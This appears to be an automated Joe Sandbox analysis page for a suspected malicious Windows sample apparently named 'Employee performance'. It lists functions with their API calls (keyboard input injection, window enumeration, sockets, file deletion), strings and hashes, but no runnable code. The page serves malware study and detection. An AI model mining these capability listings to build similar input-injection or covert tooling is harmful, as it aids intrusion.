Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 5a5fae193e548752cd9bb1ade7fec3ea7e0c570d45a6c3be9b64dafcf98adcec
Instruction ID: a5e646946bf0d25f81020e4ec4b6daddc4436d325b6451104e74fd84f272b0b2
Opcode Fuzzy Hash: 5a5fae193e548752cd9bb1ade7fec3ea7e0c570d45a6c3be9b64dafcf98adcec
Instruction Fuzzy Hash: D621B072610218BFEF228E58CC45EEB37AEFF89750F108154F9849B190C676DC5187E0

Function 010449F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 01044A08
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 01044A5C
SetErrorMode.KERNEL32(00000000,?,?,0106CC08), ref: 01044AD0

Strings

%lu, xrefs: 01044A6F

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: dede2e5567e1a18df547e337bf2322128931e4af06b51d51adc5ddacf67fc810
Instruction ID: d7647e2aab7394a7b3768540db087dd6eef015a17fc6f8a90e0131aa7a66cfac
Opcode Fuzzy Hash: dede2e5567e1a18df547e337bf2322128931e4af06b51d51adc5ddacf67fc810
Instruction Fuzzy Hash: F3318171A00109AFDB10DF54C984EAA7BF8EF04304F0440A9E945DF352DB75ED45CB61

Function 010641EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0106424F
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 01064264
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 01064271

Strings

msctls_trackbar32, xrefs: 01064226

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: c5d2bdab15cb87f80a40e1f64f3bbf2a186a8765b090ed724876d3e626bff460
Instruction ID: c0ebc7723b622d9b6ecffedb5a85fe47ab3fff8b4fef26c5764da85460f984b4
Opcode Fuzzy Hash: c5d2bdab15cb87f80a40e1f64f3bbf2a186a8765b090ed724876d3e626bff460
Instruction Fuzzy Hash: 44112931240209BEEF215F39CC45FAB3BECEF85B54F110114FAD5E6090D2B1D8519B10

Function 01032F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00FD6B57: _wcslen.LIBCMT ref: 00FD6B6A

Part of subcall function 01032DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 01032DC5
Part of subcall function 01032DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 01032DD6
Part of subcall function 01032DA7: GetCurrentThreadId.KERNEL32 ref: 01032DDD
Part of subcall function 01032DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 01032DE4

GetFocus.USER32 ref: 01032F78

Part of subcall function 01032DEE: GetParent.USER32(00000000), ref: 01032DF9

GetClassNameW.USER32(?,?,00000100), ref: 01032FC3
EnumChildWindows.USER32(?,0103303B), ref: 01032FEB

Strings

%s%d, xrefs: 01032FFF

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
String ID: %s%d
API String ID: 1272988791-1110647743
Opcode ID: eeb417c6fc2befc56b16996882b71c1046ad295ae1a13c2a1a8e84a527fbb622
Instruction ID: ba6ddc3627777c882173f7e37bed1cef301d6c6de799cced35040d57177117fd
Opcode Fuzzy Hash: eeb417c6fc2befc56b16996882b71c1046ad295ae1a13c2a1a8e84a527fbb622
Instruction Fuzzy Hash: 2711D271200205ABDF117F648CD9EEE776EAFD4304F04407AF989DB252DE3599099B70

Function 01065882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 010658C1
SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 010658EE
DrawMenuBar.USER32(?), ref: 010658FD

Strings

0, xrefs: 0106588F

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Menu$InfoItem$Draw
String ID: 0
API String ID: 3227129158-4108050209
Opcode ID: 32f38e2df5a5e60608ec48596f76fcf68de70606b3bdddca4cf75752c038396c
Instruction ID: 880278ee1b19d451e890ce4e72600ec73d8e0c393763dc5deb51a4becc53589f
Opcode Fuzzy Hash: 32f38e2df5a5e60608ec48596f76fcf68de70606b3bdddca4cf75752c038396c
Instruction Fuzzy Hash: 33016D31500258AFEB619F15DC44BAFBBB8FF453A0F00809AE889D6151DB348A84DF31

Function 0102D3A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 0102D3BF
FreeLibrary.KERNEL32 ref: 0102D3E5

Strings

GetSystemWow64DirectoryW, xrefs: 0102D3B9
X64, xrefs: 0102D2A8

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: GetSystemWow64DirectoryW$X64
API String ID: 3013587201-2590602151
Opcode ID: 7b522354269ca5a63d731483791225d34f53417002f7ae20156358e422da35ca
Instruction ID: 1ffc2450a42a1539d69a8534b8190725d6ad991385874a46435d03a6708b3255
Opcode Fuzzy Hash: 7b522354269ca5a63d731483791225d34f53417002f7ae20156358e422da35ca
Instruction Fuzzy Hash: 48F02B72906631D7F7B11595CC74AAE7758AF12701F59C58AF5C1FA108DB30CE4887D1

Function 0103007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22c1cb39cf56458dd449e01f1d5e2e2e9306d8dba11966d723a84a03747dfbbd
Instruction ID: dbae0eaa9ae505041603fbe0ed8ecc2540fb648b72a8c525f930c830e6d3bcd5
Opcode Fuzzy Hash: 22c1cb39cf56458dd449e01f1d5e2e2e9306d8dba11966d723a84a03747dfbbd
Instruction Fuzzy Hash: C1C13A75A0120AAFDB14CFA8C894AAEBBB9FF88704F108598F545EB255D731ED41CB90

Function 0105342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 01053459
CoUninitialize.OLE32 ref: 01053463
VariantInit.OLEAUT32(?), ref: 0105346E
VariantClear.OLEAUT32(?), ref: 0105371B

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Variant$ClearInitInitializeUninitialize
String ID:
API String ID: 1998397398-0
Opcode ID: c20ecd4f2ae6a062dbf3db5b68e5031d842f21610d87bc4993251872085f8c6c
Instruction ID: fc00994a931b4da2065dbdd4e8337f1cb670d6f31aef804a27b6c9073583bf0c
Opcode Fuzzy Hash: c20ecd4f2ae6a062dbf3db5b68e5031d842f21610d87bc4993251872085f8c6c
Instruction Fuzzy Hash: 82A158756043019FC750EF28C885A2ABBE5FF88354F088859FD8A9B361DB34ED01CB92

Function 01030436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,0106FC08,?), ref: 010305F0
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,0106FC08,?), ref: 01030608
CLSIDFromProgID.OLE32(?,?,00000000,0106CC40,000000FF,?,00000000,00000800,00000000,?,0106FC08,?), ref: 0103062D
_memcmp.LIBVCRUNTIME ref: 0103064E

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: d11c1d8ce0737acb61d040833a3353d3e8cf9a4ef19007004413ee41c6ddf964
Instruction ID: 5720831c45b4c2350c202680ed2604148b200fcea2eb41a4266451c94d169162
Opcode Fuzzy Hash: d11c1d8ce0737acb61d040833a3353d3e8cf9a4ef19007004413ee41c6ddf964
Instruction Fuzzy Hash: CC812A75A00109EFCB04DF98C984EEEB7B9FF89315F204598F546AB254DB71AE06CB60

Function 01011391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 010114C0

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: bdb3167623ff4bde623ec9c3a56f95d3a0584ceaaa77e0ce6fcbfb9afc84559c
Instruction ID: 6be404440a759cb1dc3283453eae81d04c26f74eb85083e15d57faeaf3329a9c
Opcode Fuzzy Hash: bdb3167623ff4bde623ec9c3a56f95d3a0584ceaaa77e0ce6fcbfb9afc84559c
Instruction Fuzzy Hash: 08413731A40105ABEB2A6BFC9C44BFE3AE4EF11B70F144265F799D61E5EE3C84409672

Function 01066278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(0165DDA0,?), ref: 010662E2
ScreenToClient.USER32(?,?), ref: 01066315
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 01066382

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 78bd10334bc338c3717cd88c91d67b2c0c07ba3b8fe0197d02035ae175a432b5
Instruction ID: c22415acc0d59cad8f802b3d1f2573315e609fc22ba4bea4ab0e618e4fe37c26
Opcode Fuzzy Hash: 78bd10334bc338c3717cd88c91d67b2c0c07ba3b8fe0197d02035ae175a432b5
Instruction Fuzzy Hash: 34518F70A00619EFDF21DF58D8809AE7BFAFF45360F108199F9959B291D732E941CB50

Function 01051AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 01051AFD
WSAGetLastError.WSOCK32 ref: 01051B0B
#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 01051B8A
WSAGetLastError.WSOCK32 ref: 01051B94

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: 98d98ff149fbed7519d87128c8676392e09888d0de69bbf7c0ebb6e09e84eb20
Instruction ID: bc73338fdfa9db25fc0d4f6fc586d3814ddb4d82023af5a8c79a858ef351894d
Opcode Fuzzy Hash: 98d98ff149fbed7519d87128c8676392e09888d0de69bbf7c0ebb6e09e84eb20
Instruction Fuzzy Hash: 0D41B334600200AFE760AF24C886F2A77E5AB44718F588499FA5A9F3D3D776DD41CB90

Function 0100B41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 762cecce9222ba988bc8b4f6d32b4fad9dd1ca804e7b0fad7db132e2debe0005
Instruction ID: b0d63faff8cb252431c4c2a5382daacfb96928d3ccc3aa6c61e8edadb8587275
Opcode Fuzzy Hash: 762cecce9222ba988bc8b4f6d32b4fad9dd1ca804e7b0fad7db132e2debe0005
Instruction Fuzzy Hash: B141067AA00305AFE7269F78CC41BAEBBE9EF88710F10456AF185DB2D0D6759A018790

Function 010456D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 01045783
GetLastError.KERNEL32(?,00000000), ref: 010457A9
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 010457CE
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 010457FA

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 137d88af0527b7cc2bb0fdbe9252de9262f7f8011729c3660ddb9328a5282b5f
Instruction ID: 24e7158e69ccbf13041f0ef056f7490c2fb1c8cbbd31e84b1df8483cc4518343
Opcode Fuzzy Hash: 137d88af0527b7cc2bb0fdbe9252de9262f7f8011729c3660ddb9328a5282b5f
Instruction Fuzzy Hash: 86414C35200611DFCB11EF14D984A5DBBE2EF88320B088499EC8AAF366DB34FD01DB91

Function 0100D8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00FF6D71,00000000,00000000,00FF82D9,?,00FF82D9,?,00000001,00FF6D71,8BE85006,00000001,00FF82D9,00FF82D9), ref: 0100D910
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0100D999
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0100D9AB
__freea.LIBCMT ref: 0100D9B4

Part of subcall function 01003820: RtlAllocateHeap.NTDLL(00000000,?,010A1444,?,00FEFDF5,?,?,00FDA976,00000010,010A1440,00FD13FC,?,00FD13C6,?,00FD1129), ref: 01003852

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: bb8e2588e232156f1fbd2ca7619e83fe5d8902db28e15934ed83cf6486a79f0e
Instruction ID: de48de5e01806a1ee68b5fffee74f7af67b0c974d168acf38b70beded9c8cac2
Opcode Fuzzy Hash: bb8e2588e232156f1fbd2ca7619e83fe5d8902db28e15934ed83cf6486a79f0e
Instruction Fuzzy Hash: 0831B371A0020AABEF26DFA8DD40EAE7BA6EF41310F0541A9FD44D7190D739D950CBA0

Function 0103AA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0103AAAC
SetKeyboardState.USER32(00000080), ref: 0103AAC8
PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0103AB36
SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0103AB88

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 8ea29d66e474d9b29fb2139193b4d06f966f4662004aae7de7a13cec5cd27f32
Instruction ID: 7b187cad42330b3dc0337898244af3011073b3d0482e2b3841b8b39ded58d0b2
Opcode Fuzzy Hash: 8ea29d66e474d9b29fb2139193b4d06f966f4662004aae7de7a13cec5cd27f32
Instruction Fuzzy Hash: 5631E531B40248EEFF398A698804BFA7BEEABC5310F044A5AE5C1D71D2D3799581C765

Function 010652C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001024,00000000,?), ref: 01065352
GetWindowLongW.USER32(?,000000F0), ref: 01065375
SetWindowLongW.USER32(?,000000F0,00000000), ref: 01065382
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 010653A8

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: LongWindow$InvalidateMessageRectSend
String ID:
API String ID: 3340791633-0
Opcode ID: b9bbb113553c979a9048ab9db7a821b23edac822742e1c650c78752f411faaab
Instruction ID: b1b980bdfaca29cc400974f049c17e6140603ee53fe6ce94258e5a61fe2745e3
Opcode Fuzzy Hash: b9bbb113553c979a9048ab9db7a821b23edac822742e1c650c78752f411faaab
Instruction Fuzzy Hash: 5531C534A55628EFFB748E18CC05BE83BA9AB04B90F48C142FBD1961E1D7F59A40DB42

Function 01067674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0106769A
GetWindowRect.USER32(?,?), ref: 01067710
PtInRect.USER32(?,?,01068B89), ref: 01067720
MessageBeep.USER32(00000000), ref: 0106778C

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 4fda925403139749ffaf123097a15b4cdac62ec6bcd0c684bac898d9c0df25d8
Instruction ID: e57f937f6f461ef60c95d15f42f96e8547a67ef6e98301c44721af995ebe44ff
Opcode Fuzzy Hash: 4fda925403139749ffaf123097a15b4cdac62ec6bcd0c684bac898d9c0df25d8
Instruction Fuzzy Hash: D841BF34601205EFEB12CF58C884EA97BF8FF48318F0481A8E5949B255D739E941CF90

Function 010616DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 010616EB

Part of subcall function 01033A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 01033A57
Part of subcall function 01033A3D: GetCurrentThreadId.KERNEL32 ref: 01033A5E
Part of subcall function 01033A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,010325B3), ref: 01033A65

GetCaretPos.USER32(?), ref: 010616FF
ClientToScreen.USER32(00000000,?), ref: 0106174C
GetForegroundWindow.USER32 ref: 01061752

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

